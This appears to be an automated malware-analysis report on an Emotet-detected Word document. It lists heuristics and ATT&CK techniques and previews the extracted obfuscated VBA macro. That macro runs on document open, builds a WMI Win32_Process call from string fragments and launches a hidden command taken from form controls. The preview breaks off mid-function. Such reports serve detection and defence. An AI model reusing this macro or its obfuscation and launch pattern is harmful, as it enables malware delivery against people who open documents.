Verdict: MALICIOUS
Risk Score: 222

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample was detected as Emotet by ClamAV and exhibits characteristics of a downloader. The presence of an AutoOpen VBA macro, coupled with a CreateObject call, strongly suggests the macro is designed to execute malicious code. The obfuscated string concatenation within the AutoOpen subroutine likely forms a command to download and run a second-stage payload, a common Emotet tactic.
Heuristics (7)
- ClamAV: Doc.Downloader.Emotet-10001946-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-10001946-0
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4755 bytes | b71326e4d2f021f059ef16d129854bc625c3654cf6f1d2d69f63b4c558041e69 |
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "QWEo84t7, 0, 0, MSForms, ComboBox"
Attribute VB_Control = "Dhfnaz, 1, 1, MSForms, ComboBox"
Attribute VB_Control = "Z80BU6vw, 2, 2, MSForms, ComboBox"
Sub _
autoopen( _
)
Debug.Print "Q_3QjEW" + ("BItwX5k" + ("hPCU08F" + "aiLDVrn" + "KSnTIw" + ("i0VrCS" + ("C_iAB6K") + "r8Y0wBL" + "TE3UHQN")) + "FK8dPS" + ("kIUQRH")) + "P1tC39Ko" + (qlt4OzDo) + "YXrFXjVD" + "E8Rc1af" + "IATCVi_" + "uhNoEsZ7"
EHfKls
Debug.Print "ASaG9s9W" + ("LJhZ2LW9" + ("q_rovC9" + "kuzTd3" + "X7s0Km7" + ("d1OOz4c" + ("AmzV6v7U") + "V1Di4i" + "DapYvj")) + "Gwz43WH" + ("S2GB8D1T")) + "ojSVq52" + (Qn2NMcnH) + "HDskshs" + "GXzFz5" + "rcI0A9WJ" + "h5jU7U4"
End Sub
Attribute VB_Name = "c124LB"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "b4oc4zjM"
Attribute VB_Name = "O9GT1o_n"
Attribute VB_Name = "JNriqt"
Attribute VB_Name = "pkHt_2i"
Attribute VB_Name = "RQUAWTi"
Attribute VB_Name = "rSVhjNI"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "OPKTCMwi"
Function EHfKls()
hK5Ks9 = ThisDocument.Dhfnaz + ThisDocument.Z80BU6vw + ThisDocument.QWEo84t7
Debug.Print "k7ppNhl4" + ("HL_tNbw" + ("q0zLoXJD" + "WcHTaD7" + "WBi7mE2u" + ("zRMLKF" + ("nBSEdKj_") + "skqSE3" + "QCMHznh0")) + "MQ9OpK" + ("jWiUanE")) + "CapNVjdv" + (hOpifrbv) + "j6fGtO" + "AnkC9v" + "q36vii9" + "G9zDn_3"
bvYvlf = "m" + "ts" + ":Win32" + "_Proces"
Debug.Print "LFL5041" + ("TcY5GZ" + ("jLCaYb" + "jvNt0nN" + "zZKuRi0" + ("RZBDvpDz" + ("w81pFS") + "f_OvPr" + "zhiWsE")) + "ErlkAjp" + ("wsZHvFc")) + "S2tlKUf" + (bQvh6WZ) + "kzHDVEO" + "HBPbGbVs" + "ZjQEZ5H5" + "pDsKrvI"
NtwOAnVd = hX5VVka + "w" + "in" + "mg" + QMNmsF + bvYvlf + "s"
Debug.Print "a95rLb" + ("fpS08B3" + ("zlNjvf" + "k7bJwF" + "czdndH" + ("Zjk0XZzK" + ("VCvrvdW") + "aja1j62" + "T7z1jS")) + "vjvSIR" + ("jUX3E_")) + "jjVDtBDj" + (olwkicm) + "ozLXSzp" + "YhIYo4M" + "Ad5fOSjf" + "E27Pjbf"
Q1iwpX(NtwOAnVd) _
.Create# hK5Ks9, CREHdD, q0F1QYf, U86Ybfl
Debug.Print "VGssoz" + ("GoKM7TM" + ("LlcTqmR" + "TF5wzw" + "Ecmi5BOY" + ("iP3zb69" + ("X7tibC") + "AbU3YV9" + "zGUkO7TC")) + "Xko01Ir" + ("S9Lfkl")) + "BrR66jr7" + (ZO_Zb1) + "rXdius86" + "plv0A_RW" + "cB9C9wM" + "wjV3sw"
End Function
Attribute VB_Name = "zk9Aq6I"
Function q0F1QYf()
bvYvlf = "mt" + "s" + ":Win32" + "_Proces"
Debug.Print "chSCfZr" + ("odWj1sw" + ("G1nAoPtd" + "iVZmZPI" + "vhZuEHn" + ("bLTRYT" + ("Bi4CUCrT") + "S38QrB" + "PtFi4Bvo")) + "DY8F_lN" + ("Rlfta_3Q")) + "NfR3jB" + (Zp3SrGKP) + "O3WDGO" + "p_qjBw" + "iCzjaDG" + "w7D6YjKS"
NtwOAnVd = oNYDwPO5 + "w" + "in" + "mg" + hFKLbIdL + bvYvlf + "s" + "Startup"
Debug.Print "ucGod_w" + ("BWYlb06T" + ("PIIiGQ98" + "wYcrUTT" + "SdviTR" + ("UDziZX" + ("Vv6AXjC") + "vo5sQHp" + "iQiozQ")) + "d5KFhA" + ("viYq32a")) + "VniYI7HU" + (czw8oWM8) + "XXnQVWjQ" + "q1pran" + "W0DvNSEj" + "nUp5RNf"
Set q0F1QYf = Q1iwpX(NtwOAnVd)
Debug.Print "tqGQjZUj" + ("Is4IYco3" + ("mE81WI3" + "Phb3Zj" + "ZFN4YhYL" + ("zWllhk" + ("ptQ5bi") + "Ndu1ina" + "oUjWii")) + "w5aksA3" + ("kOcloqU")) + "wc5tV7" + (mPkrQLm) + "hH1id4G" + "KTiHpOXQ" + "mNjftQ" + "HqcD1VJ"
With q0F1QYf
Debug.Print "Q2I9kE" + ("zUGcYwj" + ("s68kOJFA" + "THrcJH" + "FiLMHp" + ("YPAGpR" + ("mJipFrD8") + "QhQ39U" + "XKvpzRl")) + "rAiYG5rt" + ("NPabOQG")) + "qmSrnMz" + (DWNE7_) + "TnNnkJ8r" + "BujYq7" + "EiU7MR3" + "hbLTaOS"
. _
ShowWi
... (truncated)